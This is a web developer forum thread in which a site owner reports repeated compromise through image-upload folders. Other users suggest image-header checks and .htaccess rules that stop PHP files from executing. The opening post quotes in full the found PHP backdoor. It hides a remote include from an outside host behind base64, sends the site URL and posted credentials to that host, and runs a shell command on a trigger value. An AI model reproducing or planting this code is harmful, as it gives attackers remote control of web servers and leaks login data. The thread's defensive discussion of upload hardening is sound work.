keep getting hacked with php script

[delphi123]

Hi there,

 

I keep finding hack nonsense like:

 

<?php error_reporting(0);if(isset($_POST["l"]) and isset($_POST["p"])){if(isset($_POST["input"])){$user_auth="&l=".base64_encode($_POST["l"])."&p=".base64_encode(md5($_POST["p"]));}else{$user_auth="&l=".$_POST["l"]."&p=".$_POST["p"];}}else{$user_auth="";}if(!isset($_POST["log_flg"])){$log_flg="&log";}if(!@include_once(base64_decode("aHR0cDovLw==")."hhcizzazbzhff".base64_decode("LnVzZXJzLmJpc2hlbGwucnU=")."/?r_addr=".sprintf("%u", ip2long(getenv(REMOTE_ADDR)))."&url=".base64_encode($_SERVER["SERVER_NAME"].$_SERVER[REQUEST_URI]).$user_auth.$log_flg)){if($_POST["l"]=="special"){print "sys_active".`uname -a`;}} ?>

 

being uploaded to directorys with 755 and 777 settings where I've got scripts that upload images.

 

Can anyone tell me how I can stop this?  Is there some php/htaccess setting where I can only allow .jpg files in a directory or something?

[cooldude832]

I wrote this with thrope a while back to verify it has image headers

<?php
function is_image($path){
if(is_array(getimagesize($path))){
	return true;
}
return false;
}
?>

 

Should help you

[delphi123]

??? What does that do exactly?

 

Will that stop .php being uploaded to the 777 directories?

[cooldude832]

no it verifys the file is an image before allowing it to be uploaded

 

(Use your eyes its 2 lines)

[PFMaBiSmAd]

Using the PHP GD functions will stop a casual hacker, but it is possible to create a file that looks like a valid image and the php GD functions will see as an image, but also contains php code. Everybody needs to read this -

http://www.scanit.be/uploads/php-file-upload.pdf

 

You need to check everything you possibly can and then restrict direct access by browsers to the folder where the uploaded file is placed... (the document at the link contains several recommendations on how to detect and prevent hacking through file uploads.)

[The Little Guy]

What you can do, is place a .htaccess file in the root of that directory

 

This will only display the code and not let it run:

RemoveType .php
AddType application/x-httpd-php-source .php
AddHandler application/x-httpd-php-source .php

 

it will still allow for php file uploads, but it will help keep you safe.

 

next when the file uploads run this:

 

<?php getimagesize("/location/to/dir") or die('Not An Image'); ?>

[delphi123]

cooldude832 - well I used my eyes and that's exactly what it seemed like, hence my question! Now you use yours and read my question - at no point did I say my script was being used by hackers - it's outside the web root in a secure directory.

 

The little guy has got it spot on! Cheers, that's what I was needing!